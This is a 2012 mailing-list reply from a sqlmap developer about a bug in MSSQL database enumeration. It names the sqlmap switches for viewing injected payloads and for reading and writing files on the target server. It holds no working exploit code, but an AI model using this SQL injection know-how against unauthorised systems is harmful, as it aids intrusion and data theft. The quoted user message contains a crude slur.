Re: [sqlmap-users] ms sql database names' enum
Brought to you by:
inquisb
Menu
▾
▴
Re: [sqlmap-users] ms sql database names' enum
|
From: Bernardo D. A. G. <ber...@gm...> - 2012-07-03 09:50:11
|
Hi Henry, On 3 July 2012 01:01, Henry Waves <mic...@gm...> wrote: > I've met dozens of practical cases when --dbs switch becomes useless > with --dbms=mssql (can't say precisely, but maybe <2008 versions). The > only workaround proved itself useful is retrieval of db_name(i++) using > --sql-shell while other standart techniques were totally useless. We have been notified already that there might be a bug with --dbs and --tables on MSSQL (particularly version 2008). We will look closely in the upcoming weeks into reproducing this bug, if any, across all MSSQL versions. I have opened issue #55[1] for the time being and will keep you posted there with comments. > Another reason i decided to compose this miserable letter is that i > would like to see debug information on how page is being parsed in order > to determine exact string or regexp or whatever sqlmap uses to pick up > context output or to determine the boolean value for positive logical > answer. If you run sqlmap with -v 3 not only you see all injected SQLi payloads, but following detection, it shows you also the exact vector used to identify the vulnerable and exploitable SQLi technique. > Uploading specific files for mssql would be great too, because > currently i choose another commercial products which are ugly, heavy, > gui and windows only in order to execute os commands (that thing > appeared to be broken in almost every semi-complicated case while worked > fine on some fucking retarded pangolin\webcruiser\e.t.c. tools) or > upload something over designed and accessible routines of ms sql in > certain cases. Maybe i'm missing some concepts , but the first thing > i've mentioned above deserves your attention for sure. Thanks :* We have got support to interact with the underlying file system since 2009. Relevant switches are --file-read, --file-write and --file-dest. --tmp-path might also be of use here, check the user's manual for details and examples. I am not aware at the moment of any bug related to these switches, but please go ahead and open an issue[2] with details to reproduce the bug, if any. I have recently retested all these switched across all three supported DBMS (MSSQL, PgSQL and MySQL) and they all worked fine. [1] https://github.com/sqlmapproject/sqlmap/issues/55 [2] https://github.com/sqlmapproject/sqlmap/issues/new -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobile: +447788962949 (UK 07788962949) |
